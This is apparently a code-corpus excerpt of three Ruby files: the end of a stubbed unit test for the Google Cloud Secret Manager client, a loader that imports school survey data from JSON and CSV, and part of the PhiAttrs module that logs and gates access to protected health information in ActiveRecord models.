client = ::Google::Cloud::SecretManager::V1beta1::SecretManagerService::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.enable_secret_version({ name: name }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.enable_secret_version name: name do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.enable_secret_version ::Google::Cloud::SecretManager::V1beta1::EnableSecretVersionRequest.new(name: name) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.enable_secret_version({ name: name }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.enable_secret_version(::Google::Cloud::SecretManager::V1beta1::EnableSecretVersionRequest.new(name: name), grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, enable_secret_version_client_stub.call_rpc_count
end
end
def test_destroy_secret_version
# Create GRPC objects.
grpc_response = ::Google::Cloud::SecretManager::V1beta1::SecretVersion.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
name = "hello world"
destroy_secret_version_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :destroy_secret_version, name
assert_kind_of ::Google::Cloud::SecretManager::V1beta1::DestroySecretVersionRequest, request
assert_equal "hello world", request["name"]
refute_nil options
end
Gapic::ServiceStub.stub :new, destroy_secret_version_client_stub do
# Create client
client = ::Google::Cloud::SecretManager::V1beta1::SecretManagerService::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.destroy_secret_version({ name: name }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.destroy_secret_version name: name do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.destroy_secret_version ::Google::Cloud::SecretManager::V1beta1::DestroySecretVersionRequest.new(name: name) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.destroy_secret_version({ name: name }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.destroy_secret_version(::Google::Cloud::SecretManager::V1beta1::DestroySecretVersionRequest.new(name: name), grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, destroy_secret_version_client_stub.call_rpc_count
end
end
def test_set_iam_policy
# Create GRPC objects.
grpc_response = ::Google::Iam::V1::Policy.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
resource = "hello world"
policy = {}
set_iam_policy_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :set_iam_policy, name
assert_kind_of ::Google::Iam::V1::SetIamPolicyRequest, request
assert_equal "hello world", request["resource"]
assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Iam::V1::Policy), request["policy"]
refute_nil options
end
Gapic::ServiceStub.stub :new, set_iam_policy_client_stub do
# Create client
client = ::Google::Cloud::SecretManager::V1beta1::SecretManagerService::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.set_iam_policy({ resource: resource, policy: policy }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.set_iam_policy resource: resource, policy: policy do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.set_iam_policy ::Google::Iam::V1::SetIamPolicyRequest.new(resource: resource, policy: policy) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.set_iam_policy({ resource: resource, policy: policy }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.set_iam_policy(::Google::Iam::V1::SetIamPolicyRequest.new(resource: resource, policy: policy), grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, set_iam_policy_client_stub.call_rpc_count
end
end
def test_get_iam_policy
# Create GRPC objects.
grpc_response = ::Google::Iam::V1::Policy.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
resource = "hello world"
options = {}
get_iam_policy_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :get_iam_policy, name
assert_kind_of ::Google::Iam::V1::GetIamPolicyRequest, request
assert_equal "hello world", request["resource"]
assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Iam::V1::GetPolicyOptions), request["options"]
refute_nil options
end
Gapic::ServiceStub.stub :new, get_iam_policy_client_stub do
# Create client
client = ::Google::Cloud::SecretManager::V1beta1::SecretManagerService::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.get_iam_policy({ resource: resource, options: options }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.get_iam_policy resource: resource, options: options do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.get_iam_policy ::Google::Iam::V1::GetIamPolicyRequest.new(resource: resource, options: options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.get_iam_policy({ resource: resource, options: options }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.get_iam_policy(::Google::Iam::V1::GetIamPolicyRequest.new(resource: resource, options: options), grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, get_iam_policy_client_stub.call_rpc_count
end
end
def test_test_iam_permissions
# Create GRPC objects.
grpc_response = ::Google::Iam::V1::TestIamPermissionsResponse.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
resource = "hello world"
permissions = ["hello world"]
test_iam_permissions_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :test_iam_permissions, name
assert_kind_of ::Google::Iam::V1::TestIamPermissionsRequest, request
assert_equal "hello world", request["resource"]
assert_equal ["hello world"], request["permissions"]
refute_nil options
end
Gapic::ServiceStub.stub :new, test_iam_permissions_client_stub do
# Create client
client = ::Google::Cloud::SecretManager::V1beta1::SecretManagerService::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.test_iam_permissions({ resource: resource, permissions: permissions }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.test_iam_permissions resource: resource, permissions: permissions do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.test_iam_permissions ::Google::Iam::V1::TestIamPermissionsRequest.new(resource: resource, permissions: permissions) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.test_iam_permissions({ resource: resource, permissions: permissions }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.test_iam_permissions(::Google::Iam::V1::TestIamPermissionsRequest.new(resource: resource, permissions: permissions), grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, test_iam_permissions_client_stub.call_rpc_count
end
end
def test_configure
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
client = block_config = config = nil
Gapic::ServiceStub.stub :new, nil do
client = ::Google::Cloud::SecretManager::V1beta1::SecretManagerService::Client.new do |config|
config.credentials = grpc_channel
end
end
config = client.configure do |c|
block_config = c
end
assert_same block_config, config
assert_kind_of ::Google::Cloud::SecretManager::V1beta1::SecretManagerService::Client::Configuration, config
end
end
| 39.97732 | 206 | 0.720718 |
031326d5bdca7fdb4b9ea5f32d45c68204aa727f | 10,962 | require 'csv'
class ResponseLoader
def load_categories
puts 'start'
measures = JSON.parse(File.read(File.expand_path('../../../data/measures.json', __FILE__)))
puts "Loaded #{measures.length} measures"
measures.each_with_index do |measure, index|
category = Category.create(
name: measure['title'],
blurb: measure['blurb'],
description: measure['text'],
external_id: measure['id'] || index + 1
)
measure['sub'].keys.sort.each do |key|
subinfo = measure['sub'][key]
subcategory = category.child_categories.create(
name: subinfo['title'],
blurb: subinfo['blurb'],
description: subinfo['text'],
external_id: key
)
subinfo['measures'].keys.sort.each do |subinfo_key|
subsubinfo = subinfo['measures'][subinfo_key]
subsubcategory = subcategory.child_categories.create(
name: subsubinfo['title'],
blurb: subsubinfo['blurb'],
description: subsubinfo['text'],
external_id: subinfo_key
)
# if subsubinfo['nonlikert'].present?
# subsubinfo['nonlikert'].each do |nonlikert_info|
# next unless nonlikert_info['likert'].present?
# nonlikert = subsubcategory.child_measures.create(
# name: nonlikert_info['title'],
# description: nonlikert_info['benchmark_explanation'],
# benchmark: nonlikert_info['benchmark']
# )
#
# name_map = {
# "argenziano": "dr-albert-f-argenziano-school-at-lincoln-park",
# "healey": "arthur-d-healey-school",
# "brown": "benjamin-g-brown-school",
# "east": "east-somerville-community-school",
# "kennedy": "john-f-kennedy-elementary-school",
# "somervillehigh": "somerville-high-school",
# "west": "west-somerville-neighborhood-school",
# "winter": "winter-hill-community-innovation-school"
# }
#
# nonlikert_info['likert'].each do |key, likert|
# school_name = name_map[key.to_sym]
# next if school_name.nil?
# school = School.friendly.find(school_name)
# nonlikert.measurements.create(school: school, likert: likert, nonlikert: nonlikert_info['values'][key])
# end
# end
# end
end
end
end
end
def load_questions
variations = [
'[Field-MathTeacher][Field-ScienceTeacher][Field-EnglishTeacher][Field-SocialTeacher]',
'teacher'
]
questions = JSON.parse(File.read(File.expand_path('../../../data/questions.json', __FILE__)))
questions.each do |question|
category = nil
question['category'].split('-').each do |external_id|
categories = category.present? ? category.child_categories : Category
category = categories.where(external_id: external_id).first
if category.nil?
puts 'NOTHING'
puts external_id
puts categories.inspect
end
end
question_text = question['text'].gsub(/[[:space:]]/, ' ').strip
if question_text.index('.* teacher').nil?
category.questions.create(
text: question_text,
option1: question['answers'][0],
option2: question['answers'][1],
option3: question['answers'][2],
option4: question['answers'][3],
option5: question['answers'][4],
for_recipient_students: question['child'].present?
)
else
variations.each do |variation|
category.questions.create(
text: question_text.gsub('.* teacher', variation),
option1: question['answers'][0],
option2: question['answers'][1],
option3: question['answers'][2],
option4: question['answers'][3],
option5: question['answers'][4],
for_recipient_students: question['child'].present?
)
end
end
end
end
# options[:school_names_whitelist] can be passed to
# only select particular school names
def load_responses(options = {})
ENV['BULK_PROCESS'] = 'true'
answer_dictionary = {
'Slightly': 'Somewhat',
'an incredible': 'a tremendous',
'a little': 'a little bit',
'slightly': 'somewhat',
'a little well': 'slightly well',
'quite': 'very',
'a tremendous': 'a very great',
'somewhat clearly': 'somewhat',
'almost never': 'once in a while',
'always': 'all the time',
'not at all strong': 'not strong at all',
'each': 'every'
}
respondent_map = {}
unknown_schools = {}
missing_questions = {}
bad_answers = {}
year = '2017'
timeToRun = 100 * 60 * 60
startIndex = 0
stopIndex = 100000
startTime = Time.new
['student_responses', 'teacher_responses'].each do |file|
recipients = file.split('_')[0]
target_group = Question.target_groups["for_#{recipients}s"]
filepath = File.expand_path("../../../data/#{file}_#{year}.csv", __FILE__)
csv_string = File.read(filepath)
csv = CSV.parse(csv_string, :headers => true)
puts
puts
puts("LOADING CSV: #{filepath}...")
puts("LOADING CSV: #{csv.length} ROWS")
t = Time.new
csv.each_with_index do |row, index|
next if index < startIndex
if Time.new - startTime >= timeToRun || index > stopIndex
puts("ENDING #{timeToRun} SECONDS: #{Time.new - startTime} = #{startIndex} -> #{index} = #{index - startIndex} or #{(Time.new - t) / (index - startIndex)} per second")
break
end
if index % 10 == 0
puts("DATAMSG: PROCESSING ROW: #{index} OUT OF #{csv.length} ROWS: #{Time.new - t} - Total: #{Time.new - startTime} - #{timeToRun - (Time.new - startTime)} TO GO / #{stopIndex - startIndex} ROWS TO GO")
t = Time.new
end
district_name = row['What district is your school in?']
district_name = row['To begin, please select your district.'] if district_name.nil?
district = District.find_or_create_by(name: district_name, state_id: 1)
school_name = row["Please select your school in #{district_name}."]
# Allow selecting particular school names
if options[:school_names_whitelist]
next unless options[:school_names_whitelist].include?(school_name)
end
if school_name.blank?
# puts "BLANK SCHOOL NAME: #{district.name} - #{index}"
next
end
school = district.schools.find_or_create_by(name: school_name)
if school.nil?
next if unknown_schools[school_name]
puts "DATAERROR: Unable to find school: #{school_name} - #{index}"
unknown_schools[school_name] = true
next
end
respondent_id = row['Response ID']
recipient_id = respondent_map[respondent_id]
if recipient_id.present?
recipient = school.recipients.where(id: recipient_id).first
else
begin
recipient = school.recipients.create(
name: "Survey Respondent Id: #{respondent_id}"
)
rescue
puts "DATAERROR: INDEX: #{index} ERROR AT #{index} - #{district.name} - #{school_name} #{school}: #{respondent_id}"
end
respondent_map[respondent_id] = recipient.id
end
recipient_list = school.recipient_lists.find_by_name("#{recipients.titleize} List")
if recipient_list.nil?
recipient_list = school.recipient_lists.create(name: "#{recipients.titleize} List")
end
recipient_list.recipient_id_array << recipient.id
recipient_list.save!
row.each do |key, value|
t1 = Time.new
next if value.nil? or key.nil? or value.to_s == "-99"
key = key.gsub(/[[:space:]]/, ' ').strip.gsub(/\s+/, ' ')
value = value.gsub(/[[:space:]]/, ' ').strip.downcase
begin
question = Question.find_by_text(key)
rescue Exception => e
puts "DATAERROR: INDEX: #{index} Failed finding question: #{key} -> #{e}"
end
if question.nil?
next if missing_questions[key]
puts "DATAERROR: Unable to find question: #{key}"
missing_questions[key] = true
next
else
question.update_attributes(target_group: target_group) if question.unknown?
end
if (value.to_i.blank?)
answer_index = question.option_index(value)
answer_dictionary.each do |k, v|
break if answer_index.present?
answer_index = question.option_index(value.gsub(k.to_s, v.to_s))
answer_index = question.option_index(value.gsub(v.to_s, k.to_s)) if answer_index.nil?
end
if answer_index.nil?
next if bad_answers[key]
puts "DATAERROR: Unable to find answer: #{key} = #{value.downcase.strip} - #{question.options.inspect}"
bad_answers[key] = true
next
end
else
answer_index = value.to_i
end
responded_at = Date.strptime(row['End Date'], '%m/%d/%Y %H:%M')
begin
recipient.attempts.create(question: question, answer_index: answer_index, responded_at: responded_at)
rescue Exception => e
puts "DATAERROR: INDEX: #{index} Attempt failed for #{recipient.inspect} -> QUESTION: #{question.inspect}, ANSWER_INDEX: #{answer_index}, RESPONDED_AT: #{responded_at}, ERROR: #{e}"
next
end
end
end
end
ENV.delete('BULK_PROCESS')
puts 'Done bulk processing of CSV files.'
puts
puts
puts('LOAD: Creating SchoolCategory models and aggregates...')
categories = Category.all
if options[:school_names_whitelist]
schools = options[:school_names_whitelist].map {|name| School.find_by_name(name) }
else
schools = School.all
end
puts("LOAD: Processing #{schools.size} schools...")
schools.each do |school|
puts("LOAD: School: #{school.name}...")
categories.each do |category|
school_category = SchoolCategory.for(school, category).first
if school_category.nil?
school_category = SchoolCategory.create!(school: school, category: category)
end
school_category.sync_aggregated_responses
end
end
puts('LOAD: Done.')
puts
puts
recipients = schools.flat_map {|school| school.recipients }
puts("Updating #{recipients.size} recipient counts...")
recipients.each { |r| r.update_counts }
puts('Done.')
end
end
| 36.909091 | 212 | 0.582284 |
4afdbeaa10152b824ac89ae6183663cde91655ca | 25,195 | # frozen_string_literal: true
# Namespace for classes and modules that handle PHI Attribute Access Logging
module PhiAttrs
# Module for extending ActiveRecord models to handle PHI access logging
# and restrict access to attributes.
#
# @author Apsis Labs
# @since 0.1.0
module PhiRecord
extend ActiveSupport::Concern
included do
class_attribute :__phi_exclude_methods
class_attribute :__phi_include_methods
class_attribute :__phi_extend_methods
class_attribute :__phi_methods_wrapped
class_attribute :__phi_methods_to_extend
after_initialize :wrap_phi
# These have to default to an empty array
self.__phi_methods_wrapped = []
self.__phi_methods_to_extend = []
end
class_methods do
# Set methods to be excluded from PHI access logging.
#
# @param [Array<Symbol>] *methods Any number of methods to exclude
#
# @example
# exclude_from_phi :foo, :bar
#
def exclude_from_phi(*methods)
self.__phi_exclude_methods = methods.map(&:to_s)
end
# Set methods to be explicitly included in PHI access logging.
#
# @param [Array<Symbol>] *methods Any number of methods to include
#
# @example
# include_in_phi :foo, :bar
#
def include_in_phi(*methods)
self.__phi_include_methods = methods.map(&:to_s)
end
# Set of methods which should be implicitly allowed if this object
# is allowed. The methods that are extended should return ActiveRecord
# models that also extend PhiAttrs.
#
# @param [Array<Symbol>] *methods Any number of methods to extend access to
#
# @example
# has_one :foo
# has_one :bar
# extend_phi_access :foo, :bar
#
def extend_phi_access(*methods)
self.__phi_extend_methods = methods.map(&:to_s)
end
# Enable PHI access for any instance of this class.
#
# @param [String] user_id A unique identifier for the person accessing the PHI
# @param [String] reason The reason for accessing PHI
#
# @example
# Foo.allow_phi!('[email protected]', 'viewing patient record')
#
def allow_phi!(user_id = nil, reason = nil)
raise ArgumentError, 'block not allowed. use allow_phi with block' if block_given?
user_id ||= current_user
reason ||= i18n_reason
raise ArgumentError, 'user_id and reason cannot be blank' if user_id.blank? || reason.blank?
__phi_stack.push({
phi_access_allowed: true,
user_id: user_id,
reason: reason
})
PhiAttrs::Logger.tagged(PHI_ACCESS_LOG_TAG, name) do
PhiAttrs::Logger.info("PHI Access Enabled for '#{user_id}': #{reason}")
end
end
# Enable PHI access for any instance of this class in the block given only.
#
# @param [String] user_id A unique identifier for the person accessing the PHI
# @param [String] reason The reason for accessing PHI
# @param [collection of PhiRecord] allow_only Specific PhiRecords to allow access to
# &block [block] The block in which PHI access is allowed for the class
#
# @example
# Foo.allow_phi('[email protected]', 'viewing patient record') do
# # PHI Access Allowed
# end
# # PHI Access Disallowed
#
# @example
# Foo.allow_phi('[email protected]', 'exporting patient list', allow_only: list_of_foos) do
# # PHI Access Allowed for `list_of_foo` only
# end
# # PHI Access Disallowed
#
def allow_phi(user_id = nil, reason = nil, allow_only: nil, &block)
get_phi(user_id, reason, allow_only: allow_only, &block)
return
end
# Enable PHI access for any instance of this class in the block given only
# returning whatever the block returns.
#
# @param [String] user_id A unique identifier for the person accessing the PHI
# @param [String] reason The reason for accessing PHI
# @param [collection of PhiRecord] allow_only Specific PhiRecords to allow access to
# &block [block] The block in which PHI access is allowed for the class
#
# @example
# results = Foo.allow_phi('[email protected]', 'viewing patient record') do
# Foo.search(params)
# end
#
# @example
# loaded_foo = Foo.allow_phi('[email protected]', 'exporting patient list', allow_only: list_of_foos) do
# Bar.find_by(foo: list_of_foos).include(:foo)
# end
#
def get_phi(user_id = nil, reason = nil, allow_only: nil)
raise ArgumentError, 'block required' unless block_given?
if allow_only.present?
raise ArgumentError, 'allow_only must be iterable with each' unless allow_only.respond_to?(:each)
raise ArgumentError, "allow_only must all be `#{name}` objects" unless allow_only.all? { |t| t.is_a?(self) }
raise ArgumentError, 'allow_only must all have `allow_phi!` methods' unless allow_only.all? { |t| t.respond_to?(:allow_phi!) }
end
# Save this so we don't revoke access previously extended outside the block
frozen_instances = Hash[__instances_with_extended_phi.map { |obj| [obj, obj.instance_variable_get(:@__phi_relations_extended).clone] }]
if allow_only.nil?
allow_phi!(user_id, reason)
else
allow_only.each { |t| t.allow_phi!(user_id, reason) }
end
result = yield if block_given?
__instances_with_extended_phi.each do |obj|
if frozen_instances.include?(obj)
old_extensions = frozen_instances[obj]
new_extensions = obj.instance_variable_get(:@__phi_relations_extended) - old_extensions
obj.send(:revoke_extended_phi!, new_extensions) if new_extensions.any?
else
obj.send(:revoke_extended_phi!) # Instance is new to the set, so revoke everything
end
end
if allow_only.nil?
disallow_last_phi!
else
allow_only.each { |t| t.disallow_last_phi!(preserve_extensions: true) }
# We've handled any newly extended allowances ourselves above
end
result
end
# Explicitly disallow phi access in a specific area of code. This does not
# play nicely with the mutating versions of `allow_phi!` and `disallow_phi!`
#
# At the moment, this doesn't work at all, as the instance won't
# necessarily look at the class-level stack when determining if PHI is allowed.
#
# &block [block] The block in which PHI access is explicitly disallowed.
#
# @example
# # PHI Access Disallowed
# Foo.disallow_phi
# # PHI Access *Still* Disallowed
# end
# # PHI Access *Still, still* Disallowed
# Foo.allow_phi!('[email protected]', 'viewing patient record')
# # PHI Access Allowed
# Foo.disallow_phi do
# # PHI Access Disallowed
# end
# # PHI Access Allowed Again
def disallow_phi
raise ArgumentError, 'block required. use disallow_phi! without block' unless block_given?
__phi_stack.push({
phi_access_allowed: false
})
yield if block_given?
__phi_stack.pop
end
# Revoke all PHI access for this class, if enabled by PhiRecord#allow_phi!
#
# @example
# Foo.disallow_phi!
#
def disallow_phi!
raise ArgumentError, 'block not allowed. use disallow_phi with block' if block_given?
message = __phi_stack.present? ? "PHI access disabled for #{__user_id_string(__phi_stack)}" : 'PHI access disabled. No class level access was granted.'
__reset_phi_stack
PhiAttrs::Logger.tagged(PHI_ACCESS_LOG_TAG, name) do
PhiAttrs::Logger.info(message)
end
end
# Revoke last PHI access for this class, if enabled by PhiRecord#allow_phi!
#
# @example
# Foo.disallow_last_phi!
#
def disallow_last_phi!
raise ArgumentError, 'block not allowed' if block_given?
removed_access = __phi_stack.pop
message = removed_access.present? ? "PHI access disabled for #{removed_access[:user_id]}" : 'PHI access disabled. No class level access was granted.'
PhiAttrs::Logger.tagged(PHI_ACCESS_LOG_TAG, name) do
PhiAttrs::Logger.info(message)
end
end
# Whether PHI access is allowed for this class
#
# @example
# Foo.phi_allowed?
#
# @return [Boolean] whether PHI access is allowed for this instance
#
def phi_allowed?
__phi_stack.present? && __phi_stack[-1][:phi_access_allowed]
end
def __instances_with_extended_phi
RequestStore.store[:phi_instances_with_extended_phi] ||= Set.new
end
def __phi_stack
RequestStore.store[:phi_access] ||= {}
RequestStore.store[:phi_access][name] ||= []
end
def __reset_phi_stack
RequestStore.store[:phi_access] ||= {}
RequestStore.store[:phi_access][name] = []
end
def __user_id_string(access_list)
access_list ||= []
access_list.map { |c| "'#{c[:user_id]}'" }.join(',')
end
def current_user
RequestStore.store[:phi_attrs_current_user]
end
def i18n_reason
controller = RequestStore.store[:phi_attrs_controller]
action = RequestStore.store[:phi_attrs_action]
return nil if controller.blank? || action.blank?
i18n_path = [PhiAttrs.translation_prefix] + __path_to_controller_and_action(controller, action)
i18n_path.push(*__path_to_class)
i18n_key = i18n_path.join('.')
return I18n.t(i18n_key) if I18n.exists?(i18n_key)
locale = I18n.locale || I18n.default_locale
PhiAttrs::Logger.warn "No #{locale} PHI Reason found for #{i18n_key}"
end
def __path_to_controller_and_action(controller, action)
module_paths = controller.underscore.split('/')
class_name_parts = module_paths.pop.split('_')
class_name_parts.pop if class_name_parts[-1] == 'controller'
module_paths.push(class_name_parts.join('_'), action)
end
def __path_to_class
module_paths = name.underscore.split('/')
class_name_parts = module_paths.pop.split('_')
module_paths.push(class_name_parts.join('_'))
end
end
# Get all method names to be wrapped with PHI access logging
#
# @return [Array<String>] the method names to be wrapped with PHI access logging
#
def __phi_wrapped_methods
excluded_methods = self.class.__phi_exclude_methods.to_a
included_methods = self.class.__phi_include_methods.to_a
attribute_names - excluded_methods + included_methods - [self.class.primary_key]
end
# Get all method names to be wrapped with PHI access extension
#
# @return [Array<String>] the method names to be wrapped with PHI access extension
#
def __phi_extended_methods
self.class.__phi_extend_methods.to_a
end
# Enable PHI access for a single instance of this class.
#
# @param [String] user_id A unique identifier for the person accessing the PHI
# @param [String] reason The reason for accessing PHI
#
# @example
# foo = Foo.find(1)
# foo.allow_phi!('[email protected]', 'viewing patient record')
#
def allow_phi!(user_id = nil, reason = nil)
raise ArgumentError, 'block not allowed. use allow_phi with block' if block_given?
user_id ||= self.class.current_user
reason ||= self.class.i18n_reason
raise ArgumentError, 'user_id and reason cannot be blank' if user_id.blank? || reason.blank?
PhiAttrs::Logger.tagged(*phi_log_keys) do
@__phi_access_stack.push({
phi_access_allowed: true,
user_id: user_id,
reason: reason
})
PhiAttrs::Logger.info("PHI Access Enabled for '#{user_id}': #{reason}")
end
end
# Enable PHI access for a single instance of this class inside the block.
# Nested calls to allow_phi will log once per nested call
#
# @param [String] user_id A unique identifier for the person accessing the PHI
# @param [String] reason The reason for accessing PHI
# @yield The block in which phi access is allowed
#
# @example
# foo = Foo.find(1)
# foo.allow_phi('[email protected]', 'viewing patient record') do
# # PHI Access Allowed Here
# end
# # PHI Access Disallowed Here
#
def allow_phi(user_id = nil, reason = nil, &block)
get_phi(user_id, reason, &block)
return
end
# Enable PHI access for a single instance of this class inside the block.
# Returns whatever is returned from the block.
# Nested calls to get_phi will log once per nested call
#s
# @param [String] user_id A unique identifier for the person accessing the PHI
# @param [String] reason The reason for accessing PHI
# @yield The block in which phi access is allowed
#
# @return PHI
#
# @example
# foo = Foo.find(1)
# phi_data = foo.get_phi('[email protected]', 'viewing patient record') do
# foo.phi_field
# end
#
def get_phi(user_id = nil, reason = nil)
raise ArgumentError, 'block required' unless block_given?
extended_instances = @__phi_relations_extended.clone
allow_phi!(user_id, reason)
result = yield if block_given?
new_extensions = @__phi_relations_extended - extended_instances
disallow_last_phi!(preserve_extensions: true)
revoke_extended_phi!(new_extensions) if new_extensions.any?
result
end
# Revoke all PHI access for a single instance of this class.
#
# @example
# foo = Foo.find(1)
# foo.disallow_phi!
#
def disallow_phi!
raise ArgumentError, 'block not allowed. use disallow_phi with block' if block_given?
PhiAttrs::Logger.tagged(*phi_log_keys) do
removed_access_for = self.class.__user_id_string(@__phi_access_stack)
revoke_extended_phi!
@__phi_access_stack = []
message = removed_access_for.present? ? "PHI access disabled for #{removed_access_for}" : 'PHI access disabled. No instance level access was granted.'
PhiAttrs::Logger.info(message)
end
end
# Dissables PHI access for a single instance of this class inside the block.
# Nested calls to allow_phi will log once per nested call
#
# @param [String] user_id A unique identifier for the person accessing the PHI
# @param [String] reason The reason for accessing PHI
# @yield The block in which phi access is allowed
#
# @example
# foo = Foo.find(1)
# foo.allow_phi('[email protected]', 'viewing patient record') do
# # PHI Access Allowed Here
# end
# # PHI Access Disallowed Here
#
def disallow_phi
raise ArgumentError, 'block required. use disallow_phi! without block' unless block_given?
add_disallow_flag!
add_disallow_flag_to_extended_phi!
yield if block_given?
remove_disallow_flag_from_extended_phi!
remove_disallow_flag!
end
# Revoke last PHI access for a single instance of this class.
#
# @example
# foo = Foo.find(1)
# foo.disallow_last_phi!
#
def disallow_last_phi!(preserve_extensions: false)
raise ArgumentError, 'block not allowed' if block_given?
PhiAttrs::Logger.tagged(*phi_log_keys) do
removed_access = @__phi_access_stack.pop
revoke_extended_phi! unless preserve_extensions
message = removed_access.present? ? "PHI access disabled for #{removed_access[:user_id]}" : 'PHI access disabled. No instance level access was granted.'
PhiAttrs::Logger.info(message)
end
end
# The unique identifier for whom access has been allowed on this instance.
# This is what was passed in when PhiRecord#allow_phi! was called.
#
# @return [String] the user_id passed in to allow_phi!
#
def phi_allowed_by
phi_context[:user_id]
end
# The access reason for allowing access to this instance.
# This is what was passed in when PhiRecord#allow_phi! was called.
#
# @return [String] the reason passed in to allow_phi!
#
def phi_access_reason
phi_context[:reason]
end
# Whether PHI access is allowed for a single instance of this class
#
# @example
# foo = Foo.find(1)
# foo.phi_allowed?
#
# @return [Boolean] whether PHI access is allowed for this instance
#
def phi_allowed?
!phi_context.nil? && phi_context[:phi_access_allowed]
end
# Require phi access. Raises an error pre-emptively if it has not been granted.
#
# @example
# def use_phi(patient_record)
# patient_record.require_phi!
# # ...use PHI Freely
# end
#
def require_phi!
raise PhiAccessException, 'PHI Access required, please call allow_phi or allow_phi! first' unless phi_allowed?
end
def reload
@__phi_relations_extended.clear
super
end
protected
# Adds a disallow phi flag to instance internal stack.
# @private since subject to change
def add_disallow_flag!
@__phi_access_stack.push({
phi_access_allowed: false
})
end
# removes the last item in instance internal stack.
# @private since subject to change
def remove_disallow_flag!
@__phi_access_stack.pop
end
private
# Entry point for wrapping methods with PHI access logging. This is called
# by an `after_initialize` hook from ActiveRecord.
#
# @private
#
def wrap_phi
# Disable PHI access by default
@__phi_access_stack = []
@__phi_methods_extended = Set.new
@__phi_relations_extended = Set.new
# Wrap attributes with PHI Logger and Access Control
__phi_wrapped_methods.each { |m| phi_wrap_method(m) }
__phi_extended_methods.each { |m| phi_wrap_extension(m) }
end
# Log Key for an instance of this class. If the instance is persisted in the
# database, then it is the primary key; otherwise it is the Ruby object_id
# in memory.
#
# This is used by the tagged logger for tagging all log entries to find
# the underlying model.
#
# @private
#
# @return [Array<String>] log key for an instance of this class
#
def phi_log_keys
@__phi_log_id = persisted? ? "Key: #{attributes[self.class.primary_key]}" : "Object: #{object_id}"
@__phi_log_keys = [PHI_ACCESS_LOG_TAG, self.class.name, @__phi_log_id]
end
def phi_context
instance_phi_context || class_phi_context
end
def instance_phi_context
@__phi_access_stack && @__phi_access_stack[-1]
end
def class_phi_context
self.class.__phi_stack[-1]
end
# The unique identifiers for everything with access allowed on this instance.
#
# @private
#
# @return String of all the user_id's passed in to allow_phi!
#
def all_phi_allowed_by
self.class.__user_id_string(all_phi_context)
end
def all_phi_context
(@__phi_access_stack || []) + (self.class.__phi_stack || [])
end
def all_phi_context_logged?
all_phi_context.all? { |v| v[:logged] }
end
def set_all_phi_context_logged
all_phi_context.each { |c| c[:logged] = true }
end
# Core logic for wrapping methods in PHI access logging and access restriction.
#
# This method takes a single method name, and creates a new method using
# define_method; once this method is defined, the original method name
# is aliased to the new method, and the original method is renamed to a
# known key.
#
# @private
#
